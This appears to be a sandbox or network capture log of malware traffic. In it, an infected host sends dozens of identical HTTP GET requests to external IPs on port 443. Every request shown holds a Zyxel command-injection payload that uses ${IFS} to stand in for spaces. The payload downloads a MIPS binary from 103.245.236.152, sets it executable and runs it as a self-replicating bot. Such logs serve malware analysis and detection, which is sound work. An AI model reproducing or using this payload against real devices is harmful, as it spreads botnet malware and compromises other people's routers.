                                            Jan 14, 2024 15:50:25.184830904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            489192.168.2.2340490156.7.5.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184885025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            490192.168.2.234146224.43.95.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184902906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            491192.168.2.234111859.218.139.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184927940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            492192.168.2.2338980129.157.114.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184958935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            493192.168.2.2354950114.19.190.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184997082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            494192.168.2.2337234124.58.76.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185026884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            495192.168.2.2354898219.222.5.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185049057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            496192.168.2.235229454.175.11.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185101986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            497192.168.2.2349558138.94.152.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185161114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            498192.168.2.23487842.3.167.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185161114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            499192.168.2.235224213.20.145.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185189009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            500192.168.2.234948680.9.44.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185233116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            501192.168.2.2346234150.89.118.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185261965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            502192.168.2.2359044164.46.174.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185297966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            503192.168.2.2348648183.129.30.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185328007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            504192.168.2.235079024.149.91.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185338974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            505192.168.2.2345138207.44.84.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185376883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            506192.168.2.2347776161.72.0.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185411930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            507192.168.2.2357270126.148.194.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185452938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            508192.168.2.2339802207.142.47.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185475111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            509192.168.2.2347246158.112.222.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185513973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            510192.168.2.2353972128.91.201.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185553074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            511192.168.2.235735877.34.180.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185569048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            512192.168.2.2346212121.157.126.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185596943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            513192.168.2.235090480.222.28.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185642958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            514192.168.2.2341410221.77.15.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185642958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            515192.168.2.2351528145.113.211.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185678005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            516192.168.2.235842254.94.153.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185705900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            517192.168.2.235480891.91.149.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185765028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            518192.168.2.2354660210.169.52.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185772896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            519192.168.2.234480270.251.211.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185806990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            520192.168.2.2343884204.126.18.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185843945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            521192.168.2.2353284208.220.174.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185893059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            522192.168.2.2334656197.113.24.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185906887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            523192.168.2.234131262.42.180.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185937881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            524192.168.2.2359092112.117.80.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185966969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            525192.168.2.2347662210.53.110.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.185997963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            526192.168.2.2357350202.252.43.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186058044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            527192.168.2.2343932196.173.20.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186073065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            528192.168.2.234226469.71.157.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186110973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            529192.168.2.2343830207.171.189.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186136007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            530192.168.2.2334250131.174.219.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186189890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            531192.168.2.234052292.153.175.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186203003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            532192.168.2.2345246101.177.71.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186234951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            533192.168.2.2334554105.21.3.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186249018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            534192.168.2.2346704103.21.22.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186276913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            535192.168.2.2332940144.173.220.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186295986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            536192.168.2.233395061.174.75.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186356068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            537192.168.2.234793898.141.115.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186363935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            538192.168.2.2351012113.17.220.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186402082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            539192.168.2.2337438201.231.167.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186407089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            540192.168.2.235587640.33.122.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186448097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            541192.168.2.2360164196.63.245.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186464071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            542192.168.2.2356308156.114.167.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186516047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            543192.168.2.2342888212.51.185.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186517000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            544192.168.2.235362247.228.191.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186548948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            545192.168.2.2341918162.15.99.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186582088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            546192.168.2.2353786114.242.225.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186623096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            547192.168.2.2356124128.62.30.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186660051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            548192.168.2.2358308196.80.252.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186698914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            549192.168.2.2340784147.214.48.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186700106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            550192.168.2.2345264149.244.146.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186722994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            551192.168.2.235295860.88.125.248443
                                            TimestampBytes transferredDirectionData
